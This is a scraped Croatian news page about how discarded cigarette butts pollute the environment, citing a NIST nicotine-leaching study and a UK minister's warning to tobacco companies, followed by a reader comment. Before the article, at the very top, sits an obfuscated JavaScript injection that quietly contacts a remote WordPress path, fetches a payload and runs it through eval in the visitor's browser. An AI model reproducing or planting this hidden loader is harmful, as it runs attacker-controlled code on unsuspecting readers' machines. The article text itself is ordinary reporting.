;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Kako opušci utječu na okoliš

Trilijuni opušaka bace se svake godine, što ih čini “najbrojnijim pojedinačnim komadom smeća na svijetu”, prema STOP-u, organizaciji za borbu protiv duhana.

Procjenjuje se da 1,3 milijarde pušača u svijetu “nepravilno odlaže” oko 4,5 bilijuna cigareta svake godine. Bačeni opušci obično se gomilaju u parkovima, plažama, ulicama i autobusnim stanicama jer su dovoljno mali da izgledaju bezopasnije od vidljivije vrste smeća. Zbog svoje veličine vjerojatnije je da će biti odloženi na neprikladan način, a čak je poznato da čine oko 20% otpada prikupljenog tijekom čišćenja oceana.

Kemikalije koje iscure iz opuška mogu biti dovoljno otrovne da ubiju 50% morske i slatkovodne ribe izložene tijekom 96 sati. Taj je postotak izračunat pokusima u kojima su opušci bili potopljeni u litru vode 24 sata.

Dustin Poppendieck, znanstvenik na Nacionalnom institutu za standarde i tehnologiju (NIST) zajedno sa svojim timom, otkrio da korišten opušak (onaj koji je već hladan na dodir) može u jednom danu ispustiti do 14% nikotina koji emitira cigareta koja aktivno gori.

“Bio sam apsolutno iznenađen”, rekao je Poppendieck. “Brojke su značajne i mogle bi imati važan utjecaj kada se opušci odlažu u zatvorenom prostoru ili u automobilima.” Mjerenja NIST-a provedena su prema međuagencijskom sporazumu s FDA-om, kao dio studije s ciljem utvrđivanja ukupnog utjecaja pušenja cigareta na živote ljudi.

Poppendieckov tim izmjerio je osam od stotina kemikalija koje obično ispuštaju cigarete. Dodatno, izmjerili su triacetin, plastifikator koji se često koristi u filterima kako bi zadržali svoju konzistenciju, a čini čak 10% filtera.

Ali čak je i to “samo dio štete po okoliš koju uzrokuje duhanska industrija”, objasnio je Stop, budući da se duhan ne samo “gaji na krčenim šumama” već njegova proizvodnja “razgrađuje tlo i zagađuje zrak, zemlju i vodu”. Organizacija je objasnila da se, nažalost, godišnje sijeku milijarde stabala za proizvodnju cigareta, što čini 5% globalnog krčenja šuma.

Britanske duhanske tvrtke pozvane su na akciju

U međuvremenu, britanska ministrica okoliša Rebecca Pow upozorila je lokalne duhanske tvrtke da poduzmu nešto u vezi s milijunima opušaka koji su bačeni na lokalnim ulicama ili će se u protivnom suočiti sa strožim zakonima.

Ministrica Pow pozvala je na akciju glavne igrače u industriji, ponajviše Udrugu proizvođača duhana i cigaretne divove Philip Morris i Japan Tobacco International koji posjeduje brendove Silk Cut, Camel i Benson & Hedges. “Ako ne možemo unaprijediti ovu raspravu… morat ćemo razmisliti o tome koje korake vlada može poduzeti kako bi osigurala da duhanska industrija preuzme sve veću odgovornost za otpad koji stvaraju njezini proizvodi”, rekla je u pismu upućenom duhanskim tvrtkama.

Tags:
Choose your Reaction!
  • Stvarno zabrinjavajuće. Nažalost, i sam sam godinama doprinosio tome kao aktivan pušač :(

Leave a Comment